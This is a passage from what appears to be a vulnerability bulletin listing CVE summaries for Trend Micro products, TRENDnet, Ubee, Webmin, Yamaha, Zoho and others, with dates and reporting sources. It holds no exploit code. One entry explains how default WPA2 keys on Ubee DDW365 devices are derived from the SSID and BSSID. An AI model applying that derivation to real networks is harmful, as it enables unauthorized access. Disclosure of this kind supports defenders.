trend_micro_inc. — trend_micro_apex_central
 
Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers. Please note this vulnerability is similar, but not identical to CVE-2023-52326. 2024-01-23 not yet calculated CVE-2023-52329
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_central
 
A cross-site scripting vulnerability in Trend Micro Apex Central could allow a remote attacker to execute arbitrary code on affected installations of Trend Micro Apex Central. Please note: user interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. 2024-01-23 not yet calculated CVE-2023-52330
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_central
 
A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2024-01-23 not yet calculated CVE-2023-52331
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
An agent link vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2024-01-23 not yet calculated CVE-2023-47192
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47194. 2024-01-23 not yet calculated CVE-2023-47193
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47195. 2024-01-23 not yet calculated CVE-2023-47194
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47196. 2024-01-23 not yet calculated CVE-2023-47195
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47197. 2024-01-23 not yet calculated CVE-2023-47196
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47198. 2024-01-23 not yet calculated CVE-2023-47197
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47199. 2024-01-23 not yet calculated CVE-2023-47198
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47193. 2024-01-23 not yet calculated CVE-2023-47199
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
A plug-in manager origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47201. 2024-01-23 not yet calculated CVE-2023-47200
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
A plug-in manager origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47200. 2024-01-23 not yet calculated CVE-2023-47201
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
A local file inclusion vulnerability on the Trend Micro Apex One management server could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2024-01-23 not yet calculated CVE-2023-47202
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_apex_one
 
A security agent link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2024-01-23 not yet calculated CVE-2023-52090
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_deep_security_agent
 
An improper access control vulnerability in Trend Micro Deep Security 20.0 and Trend Micro Cloud One – Endpoint and Workload Security Agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2024-01-23 not yet calculated CVE-2023-52337
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_deep_security_agent
 
A link following vulnerability in the Trend Micro Deep Security 20.0 and Trend Micro Cloud One – Endpoint and Workload Security Agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2024-01-23 not yet calculated CVE-2023-52338
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_mobile_security_for_enterprise
 
Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker. Please note, this vulnerability is similar to, but not identical to, CVE-2023-41177. 2024-01-23 not yet calculated CVE-2023-41176
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_mobile_security_for_enterprise
 
Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker. Please note, this vulnerability is similar to, but not identical to, CVE-2023-41178. 2024-01-23 not yet calculated CVE-2023-41177
security@trendmicro.com
security@trendmicro.com
trend_micro_inc. — trend_micro_mobile_security_for_enterprise
 
Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker. Please note, this vulnerability is similar to, but not identical to, CVE-2023-41176. 2024-01-23 not yet calculated CVE-2023-41178
security@trendmicro.com
security@trendmicro.com
trendnet — tew-411brpplus
 
A command injection issue in TRENDnet TEW-411BRPplus v.2.07_eu that allows a local attacker to execute arbitrary code via the data1 parameter in the debug.cgi page. 2024-01-25 not yet calculated CVE-2023-51833
cve@mitre.org
cve@mitre.org
ubee — ddw365_xcnddw365
 
Ubee DDW365 XCNDDW365 devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. A remote attacker (in proximity to a Wi-Fi network) can derive the default WPA2-PSK value by observing a beacon frame. A PSK is generated by using the first six characters of the SSID and the last six of the BSSID, decrementing the last digit. 2024-01-21 not yet calculated CVE-2024-23726
cve@mitre.org
uniswapfrontrunbot — 0xdB94c
 
A vulnerability in UniswapFrontRunBot 0xdB94c allows attackers to cause financial losses via unspecified vectors. 2024-01-19 not yet calculated CVE-2023-47034
cve@mitre.org
cve@mitre.org
united_boxing_gym — mini-app_line
 
An issue in UNITED BOXING GYM mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-26 not yet calculated CVE-2023-48128
cve@mitre.org
webcalendar — webcalendar
 
WebCalendar v1.3.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /WebCalendarvqsmnseug2/edit_entry.php. 2024-01-25 not yet calculated CVE-2024-22635
cve@mitre.org
webkul — bundle
 
SQL injection vulnerability in Webkul Bundle Product 6.0.1 allows a remote attacker to execute arbitrary code via the id_product parameters in the UpdateProductQuantity function. 2024-01-23 not yet calculated CVE-2023-51210
cve@mitre.org
webmin — webmin
 
Cross Site Scripting vulnerability (XSS) in webmin v.2.105 and earlier allows a remote attacker to execute arbitrary code via a crafted payload to the “Execute cron job as” tab Input field. 2024-01-25 not yet calculated CVE-2023-52046
cve@mitre.org
whatacart — whatacart
 
WhatACart v2.0.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /site/default/search. 2024-01-26 not yet calculated CVE-2024-22551
cve@mitre.org
yamaha_corporation — wlx222
 
Active debug code exists in Yamaha wireless LAN access point devices. If a logged-in user who knows how to use the debug function accesses the device’s management page, this function can be enabled by performing specific operations. As a result, an arbitrary OS command may be executed and/or configuration settings of the device may be altered. Affected products and versions are as follows: WLX222 firmware Rev.24.00.03 and earlier, WLX413 firmware Rev.22.00.05 and earlier, WLX212 firmware Rev.21.00.12 and earlier, WLX313 firmware Rev.18.00.12 and earlier, and WLX202 firmware Rev.16.00.18 and earlier. 2024-01-24 not yet calculated CVE-2024-22366
vultures@jpcert.or.jp
vultures@jpcert.or.jp
zoho — manageengine
 
Zoho ManageEngine ADAudit Plus before 7270 allows admin users to view names of arbitrary directories via path traversal. 2024-01-25 not yet calculated CVE-2023-50785
cve@mitre.org

Back to top

Posted by

in